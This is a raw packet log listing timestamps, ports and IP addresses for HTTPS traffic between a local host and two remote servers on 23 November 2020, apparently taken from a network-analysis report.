Nov 23, 2020 10:01:17.911014080 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.911051035 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.911092043 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.911355972 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.911396980 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.911441088 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.911453009 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.911504030 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.911509991 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.911693096 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.911920071 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.912884951 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.912934065 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.912978888 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.912983894 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.913032055 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.913055897 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.913209915 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.913252115 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.913294077 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.913319111 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.913358927 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.913362980 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.914640903 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.914766073 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.915872097 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.915914059 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.915950060 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.915971041 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.916001081 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.916007996 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.916353941 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.916395903 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.916430950 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.916438103 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.916462898 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.916476965 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.920763016 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.920943022 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.922018051 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.922157049 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.925770998 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.928997993 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.929367065 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.929702997 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.929717064 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.929835081 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.929948092 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.942004919 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.942004919 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.942038059 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.943876028 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.943893909 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.945175886 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.945261002 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.945847988 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.946671009 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.946839094 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.946890116 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.948174953 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.948260069 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.948508978 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.948566914 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.948602915 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.948776960 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949003935 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949155092 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949203014 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949217081 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949244976 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949285030 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949301004 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949306965 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949322939 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949362040 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949367046 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949369907 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949428082 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949438095 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949482918 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949538946 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949542999 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949553013 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949596882 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949635029 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949651957 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949656010 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949676037 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.949687958 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.949800014 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.950345039 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.950387955 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.950423002 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.950453997 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.951004028 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.951046944 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.951097012 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.951107025 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.951637983 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.951679945 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.951704979 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.952275038 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.952316999 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.952328920 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.952334881 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.952356100 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.952408075 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.952411890 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.953222990 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.953267097 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.953290939 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.953308105 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.953351974 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.953357935 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.954098940 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.954138994 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.954171896 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.954180956 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.954240084 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.954251051 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.955063105 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.955331087 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.958138943 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.961039066 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.961154938 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.961795092 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.961920023 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.962086916 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.962181091 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.962963104 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.964155912 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.964200974 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.964253902 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.964276075 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.964765072 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.964839935 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.965581894 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.965686083 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.966414928 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.966551065 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.967556953 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.967605114 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.967664003 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.967684984 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968497992 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968544006 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968580008 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968583107 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968625069 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968637943 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968645096 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968672991 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968715906 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968748093 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968754053 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968759060 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968766928 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.968795061 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.968801022 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.969526052 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.969573021 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.969585896 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.969599009 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.969619989 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.969666958 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.969672918 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.970483065 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.970529079 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.970567942 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.970587969 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.970607042 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.970613956 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.971364975 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.971409082 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.971426964 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.971450090 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.971497059 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.971508980 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.972249985 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.972296000 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.972317934 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.972335100 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.972379923 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.972393990 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.973192930 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.973237991 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.973275900 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.973289967 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.973308086 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.973402023 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.974061966 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.974106073 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.974143982 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.974159956 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.974184990 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.974280119 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.974925995 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.974947929 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.974965096 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.975008965 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.975037098 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.975826025 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.975846052 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.975863934 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.975915909 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.975929976 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.976703882 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.976723909 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.976789951 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.977272034 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.977350950 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.978115082 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.978302002 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.978321075 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.978355885 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.978369951 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.978406906 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.978434086 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.978466988 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.978466988 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.978519917 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.979320049 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.979636908 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.979657888 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.979674101 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.979708910 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.979732990 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.979736090 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.979779005 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.979861975 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:17.979911089 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.985299110 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.985379934 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.990269899 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.990355015 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.990916014 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.993599892 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.999691010 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.012883902 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.013070107 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:18.013425112 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.024760962 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:18.024867058 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.025171041 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.027973890 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.028362036 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.031399012 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.031418085 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.031469107 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.031491995 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.033561945 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.043720007 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.043852091 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:18.044034004 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:18.046133041 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.046154976 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.046258926 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.046891928 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.049853086 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.052433968 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.054356098 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.056319952 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.056477070 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.057851076 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.057877064 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.057914972 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.057931900 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.057948112 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.057960033 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.058002949 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.058018923 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.058037043 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.058051109 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.058088064 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.058105946 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.062094927 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.062227011 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.062664032 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.062690020 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.062704086 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.062783003 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.062829971 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.062882900 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.062892914 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.087821007 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.087850094 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.087941885 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089240074 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089266062 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089286089 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089304924 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089342117 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089349031 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089387894 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089431047 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089468002 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089487076 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089528084 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089545012 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089575052 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089591980 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089632034 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089658022 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089693069 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089731932 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089745998 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089783907 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.089838982 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089870930 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.089953899 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.090523005 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.094161987 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094186068 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094206095 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094223022 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094239950 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094254017 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.094285011 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.094316006 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094325066 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.094352961 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094373941 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.094405890 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.094476938 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.094538927 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.107587099 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:18.119039059 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.119267941 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.119285107 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.119306087 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.119324923 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.119343042 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.119402885 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120524883 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120543957 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120579958 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120601892 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120620012 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120636940 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120666981 CET	443	49751	87.248.118.22	192.168.2.6
